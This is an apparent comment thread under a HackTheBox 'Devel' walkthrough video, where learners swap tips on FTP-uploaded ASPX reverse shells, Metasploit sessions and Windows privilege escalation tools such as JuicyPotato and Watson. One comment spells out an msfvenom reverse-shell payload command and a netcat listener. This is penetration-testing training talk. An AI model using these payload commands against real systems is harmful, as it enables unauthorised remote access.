"We actually crashed the box.... That is unique."
I lol'ed there.
This is supposed to be an easy box? God help me XD
I am like you xD
I watched the walkthrough of The Cyber Mentor and came here to see any exploits without Metasploit, however, the first sentence is "I'll do it only with Metasploit" 😆 still great content, thanks for that!
Same, I can't figure out the priv esc on this box without using Metasploit. :/
So I finally did it manually. Some hints: you can compile an older version of Watson 0.1 (github.com/rasta-mouse/Watson) that is compatible with the server's build in order to enumerate some working vulnerabilities. From there you should be able to compile a working vuln PoC and get system. ;)
@TheDexxra Also you can impersonate a token with juicy-potato and get a SYSTEM shell.
I wonder why the PHP shell doesn't work.
I like that dramatic pause when /test didn't work, but you got out like a champ. Keep up the great work!
Thank you so much darlin💋❤. This is delicious. Taught like a Jedi master.
I learn every day with your videos...! Thanks a lot for sharing, really.
The architecture of the machine
Thank you for the video. As for me, in the privilege escalation it needed to be changed to %TEMP%, otherwise the second one didn't work.
But how to perform privilege escalation without Metasploit??? In OSCP Metasploit use is limited.
Only one time! That's it.
I was looking into the same issue. We are able to use the multi handler in the exam, and I attempted to create a stageless exploit (windows/shell_reverse_tcp) using msfvenom to then catch the reverse shell using the multi handler and not meterpreter. I have not had success, as the multi handler attempts to upload the DLL, which in this case I do not think will work.
@Gravitized it will work if you use the following: msfvenom -p windows/shell_reverse_tcp LHOST=yourip RHOST=your port -f aspx > filename.aspx
You will need ncat running, using nc -nvlp portnumber
This will catch the shell and you will be in.
@eltonsjohn1416 hi, do you have to use the multi handler to proceed with the connection? Or can it be done through netcat? I am new to this, studying The Cyber Mentor's Udemy course. Thx
In msfvenom, what if my payload file were an exe for this particular machine instead of aspx? Would that still work? If not, how would I know the correct file type?
Thanks for this awesome video.
What happens if you type whoami on the shell you have at 9:35? Aren’t you already root? Why do you need to trigger another payload?
I am not exactly sure how users work in Windows, but it seems that the IIS server is managed by the user apppool (which is what you get after typing whoami), so it makes sense that the reverse shell will be launched under that user. He still needs to escalate to root. You can find the list of users that are used by IIS here: stackoverflow.com/questions/5729264/what-are-all-the-user-accounts-for-iis-asp-net-and-how-do-they-differ
At 4:34, when I enter the command to get the Windows payload, all I get at this stage is just the msfvenom help. I used options, grep and did this ten times; what is wrong with it? Do I need to run msfvenom in a specific directory or something? Thanks
Recently tried out this box, actually JuicyPotato can be used for privilege escalation!
Yeah, that's how I did it, worked easy enough! Glad I found it on my own.
Couldn't figure out how you put the session in the background. Ended up causing it to crash and now I'm so lost.
Everything works fine until I try to run the local exploit suggester and the session dies. What's causing this?
Hey, I saw your comment here and under a Cyber Mentor vid. Got a fix for it?
Do you maybe have a walkthrough that avoids using meterpreter/msf? I am trying to root the boxes without these tools, as it is allowed only once during the OSCP. My reverse shell immediately closes for some reason.
Great job anyway :)
Check Bastard or Optimum; in those I don't use Metasploit. I do my best to not repeat tools, techniques, or procedures.
What could the issue be if I don't see the command line at 9:12 and I get straight into the meterpreter command line? In other words, I cannot type "sessions -i 1" because I am already in the next level that starts with "meterpreter" for some reason...
Did you ever find a solution?
@ippsec trying something just like this on a very similar box but when I navigate to the aspx file via the url it doesn’t execute the file/script to give me the shell, it only gives me a pop up window and an option to save the file. Why would an FTP server do this?
Sounds like a permission issue. Should set an aspx server up, modify the permissions of aspx files and note the behavior. Could also be configured to not execute files out of a directory or files owned by a user.
Did you get this figured out? I am having the same problem.
It's really simple and easy to hack!
Ippsec you are the best !
Hey. First, thanks for all of your walkthroughs. Second, I have run across this problem on this box and one other. Even when following your tutorial exactly I have the issue... so clearly the problem is on my end. I cannot get my aspx file to execute. Even with the exact msfvenom command you use, it doesn't work. When I browse to the shell file on the server, the text of the shellcode displays but does not execute. I'm not finding any answers in my research. Any tips?
Did you try to upload regular text within the aspx file to make sure your payloads are getting uploaded? Or perhaps you need to check what your HTB IP is when setting the LHOST option on msfvenom.
HackTheBox also has a Discord. Look it up!
Did you ever find a solution?
Hello, what command do you use to exit meterpreter and background session 1 at 9:56?
Just type background.
Hey Ippsec, what could I do so that I spend less time researching and get directly onto the exploit? Any suggestions on that would be very helpful.
That takes experience and exposure. Research is important.
@ippsec Any hints on the MS17-010 exploit for Win 7 Enterprise x86? I am trying to elevate by exposing Devel's local SMB ports through chisel, and it is clearly vulnerable to MS17-010, but for crying out loud I can't get any typical eternal_blue exploits to work.
Right now I'm currently working on retired boxes to further improve my skills before taking CRTP and OSCP. While I was working on this box, I initially used the webdav_upload_asp module and it worked; I got the SYSTEM user directly without sweat. However, I got disconnected, and when I tried the exploit again it's not working anymore.
I directly uploaded an aspx reverse shell to FTP and called nc, but I'm stuck with priv esc. Trying to make something without msfconsole. Also trying OSCP.
What did you use ruby for? I did not see the window for ruby come up.
Can you explain why you used ruby?
Metasploit probably.
Tmux renames tabs and is not always right.
How is this an easy one? How does a beginner learn all these intricacies? Do I just have to keep watching walkthroughs until I collect enough knowledge to do it myself?
Another amazing walkthrough, I enjoyed every walkthrough of yours. Btw I'm new to CTF, how can I start my journey? And how do I get that mindset of "after this I have to try this"? I get too confused about what to do next.
How's your journey, are you really good at CTFs now???
Can't I upload a reverse shell through FTP and call it from the web? (I'm new to Windows)
I think that's exactly what IppSec is doing here. He is making the server execute code by navigating to the uploaded payload.
Sir, why did you change the port to 4449 instead of 4444? Because in the payload you have given port 4444.
Because there was already an open connection on port 4444 with the meterpreter msfvenom payload.
Why was aspx chosen and not asp?
Can u use LFI to get a shell?
How can we solve this without Metasploit?
I'm sure if you watch more videos you'll figure it out easily.
with juicypotato probably
Thanks
It's only been retired a few hours, you didn't waste any time did u? Skynet...lol
Nope. Try my best to have videos up an hour before new box launches
Let's go over to a Ruby window with no explanation on how that's done.
04:16 clue is good, asp and aspx
not completed
How can I know when a machine will be retired?
When there's a machine queued up it will be on the unreleased tab. There isn't one currently queued up for next week. It should be Optimum next, as that is the one that should have retired today.
easy box ! thx
Thanks a lot for the tutorial, subscribed with the bell ^^. I owned the machine, but something odd seems to happen for me with msfvenom (msfvenom -l | grep windows): this command is not working at all for me; every time I tried it, I got the help display (-h), idk.
Did you get that grep windows command to work? I'm having the same issue.
Ok, I found out the fix: you have to give a proper argument for -l. I used the following: "msfvenom -l payloads | grep windows"
Good, now I know that you have a VIP account, because I tried the same vector and same exploit but it did not work XD, so it works better for VIP accounts sh*t!!
I did this box before VIP was even introduced. I use VIP for videos as there's less chance someone screws with the machine while I'm recording. The only difference between non-VIP and VIP is the number of users in the environment. Just revert the box before you begin and you should be good to go. If someone cancels the revert, then you know it's being worked on.
1:01 Shouldn't that be "I've already *run* this"?
If you're coming to my videos for proper grammar/parts of speech while speaking, you're in the wrong place. ha.